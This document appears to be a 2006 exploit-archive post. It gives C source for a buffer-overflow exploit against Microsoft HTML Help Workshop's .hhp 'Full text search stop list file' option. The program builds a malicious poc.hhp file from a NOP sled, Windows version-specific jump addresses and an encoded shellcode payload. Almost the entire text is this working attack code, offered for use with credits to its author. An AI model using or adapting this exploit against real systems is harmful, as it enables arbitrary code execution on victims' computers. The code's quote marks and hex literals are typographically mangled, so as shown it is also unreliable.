Rated as : Moderate Risk
/*
Microsoft HTML Help Workshop .hhp file Full text search stop list file
Header Buffer Overflow Exploit
The Buffer Overflow in Full text search stop list file in Options in a HHP
file.
Bug found by: k3xji
Exploit coded by: k3xji
Mail: sumerc@gmail.com
Web: www.guvenliklab.com
Change sp2_jmp according to your OS.
*/
#include “stdio .h”
#include “string .h”
char sta[]=
“[OPTIONS]\n”
“Compatibility=1.1 or later\n”
“Compiled file=k3xji.chm\n”
“Full text search stop list file=”;
char fin[]=
“\nDisplay compile progress=No\n”
“Language=0×41f Turkish\n\n\n”
“[INFOTYPES]”;
long sp2_jmp = 0×7c941eed;
long sp1_jmp = 0×77fb59cc;
long win2ksp4_jmp = 0×7c4fedbb;
long win2003sp0_jmp = 0×77fb8bab;
long win2003sp1_jmp = 0×77e8fa6a;
char shellcode[]=
“\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02″
“\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48″
“\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4″
“\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12″
“\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69″
“\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6″
“\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5″
“\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21″
“\x61\xdd\x0e\x4d”;
int main(int argc,char *argv[])
{
printf(”\nMicrosoft Help WorkShop hhp Header Buffer Overflow”);
printf(”\nBug discovered by k3xji”);
printf(”\nExploit coded by k3xji”);
printf(”\nE-Mail: sumerc@gmail.com”);
FILE *vuln;
char overflow[0×1f4];
vuln = fopen(”poc.hhp”,”w+”);
memset(overflow, 0×90, 500);
*(long*)&overflow[0×118] = sp2_jmp;//change OS here
memcpy(overflow+0×12c, &shellcode, sizeof(shellcode));
if(vuln)
{
fprintf(vuln,”%s%s\n%s”,sta,overflow,fin);
fclose(vuln);
}
return 0;
}
securitydot.net - 2006-02-14
|
